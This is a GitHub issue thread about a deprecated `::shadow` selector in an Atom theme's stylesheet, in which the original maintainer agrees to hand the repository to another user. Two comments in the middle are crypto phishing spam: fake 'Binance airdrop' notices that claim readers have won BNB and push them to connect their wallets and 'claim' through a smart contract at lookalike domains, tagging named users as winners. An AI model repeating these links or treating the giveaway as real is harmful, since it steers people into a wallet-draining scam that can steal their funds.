### ISSUE TITLE
Deprecated selector in `black-and-white-ui\index.less`

### ISSUE THREAD

**Issue by GeorgeWL** [damassi/atom-black-and-white-ui#2]
In `black-and-white-ui\index.less`: 

Starting from Atom v1.13.0, the contents of `atom-text-editor` elements are no longer encapsulated within a shadow DOM boundary. This means you should stop using `:host` and `::shadow` pseudo-selectors, and prepend all your syntax selectors with `syntax--`. To prevent breakage with existing style sheets, Atom will automatically upgrade the following selectors:

* `atom-text-editor[mini]::shadow .cursor` => `atom-text-editor[mini].editor .cursor`

* `atom-text-editor[mini] .placeholder-text,
atom-text-editor[mini]::shadow .placeholder-text` => `atom-text-editor[mini] .placeholder-text,
atom-text-editor[mini].editor .placeholder-text`

* `atom-text-editor[mini] .selection .region,
atom-text-editor[mini]::shadow .selection .region` => `atom-text-editor[mini] .selection .region,
atom-text-editor[mini].editor .selection .region`

* `atom-text-editor[mini] .cursor,
atom-text-editor[mini]::shadow .cursor` => `atom-text-editor[mini] .cursor,
atom-text-editor[mini].editor .cursor`

* `atom-text-editor[mini].is-focused,
atom-text-editor[mini].is-focused::shadow` => `atom-text-editor[mini].is-focused,
atom-text-editor[mini].is-focused.editor`

* `atom-text-editor[mini].is-focused .selection .region,
atom-text-editor[mini].is-focused::shadow .selection .region` => `atom-text-editor[mini].is-focused .selection .region,
atom-text-editor[mini].is-focused.editor .selection .region`

Automatic translation of selectors will be removed in a few release cycles to minimize startup time. Please, make sure to upgrade the above selectors as soon as possible.

**Comment by GeorgeWL** [comment]
@damassi guessing you don't support the theme anymore?

If so, I'm gonna do a PR to fix this for you, can you please push the changes when I do?

If not, please let me know, as I'd rather get your permission before I fork it.

**Comment by damassi** [comment]
@GeorgeWL - oh hey! i'm so sorry for missing this issue being.For some reason I never got notification. But yeah, I've jumped on the VSCode train as I'm using typescript more and more. Will happily merge prs and if you want the repo I can transfer it to you!

**Comment by GeorgeWL** [comment]
rad @damassi 

I'm going more towards JSX atm, and Atom still seems to be king for that for me, I'll get round to it yeah, likely this weekend.

Yeah I think I would like repo transfer actually, it's a nice theme.

**Comment by damassi** [comment]
Sending yr way!

**Comment by prezo-ci-bkp** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by DavidGhedini** [comment]
# $BNB Airdrop Guide: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.000k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @bevis-lin, @1fth3n3ls3, @martin-888, @MartynasT, @kumataz, @bijeebuss, @mkragness

**Comment by GeorgeWL** [comment]
I'm also on the VSCode train nowadays haha

Maybe it would make sense to mark this repo as No Longer Maintained, I've seen others do that by adding it as text in bold on the repo readme
